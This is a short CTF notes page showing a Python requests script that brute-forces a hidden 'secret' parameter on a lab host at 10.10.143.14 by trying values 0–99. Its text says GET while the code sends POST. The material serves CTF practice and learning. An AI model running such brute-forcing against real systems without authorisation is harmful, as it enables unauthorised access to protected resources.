> For the complete documentation index, see [llms.txt](https://cajac.gitbook.io/ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cajac.gitbook.io/ctf-notes/web/web-brute-forcing/brute-forcing-with-requests.md).

# Brute-forcing with Requests

## Brute-forcing with Requests

Example with brute-forcing a value of `sercret` GET--parameter

```python
#!/usr/bin/python3

import requests

session = requests.session()

for secret in range(0, 100):
    url = f"http://10.10.143.14/th1s_1s_h1dd3n/?secret={secret}"
    req = session.post(url)
    if not "That is wrong!" in req.text:
        print(f"Correct secret is: {secret}")
        print(req.text)

session.close()
```

## Resources

requests - PyPI Module: <https://pypi.org/project/requests/>

requests - ReadTheDocs: <https://requests.readthedocs.io/en/latest/>
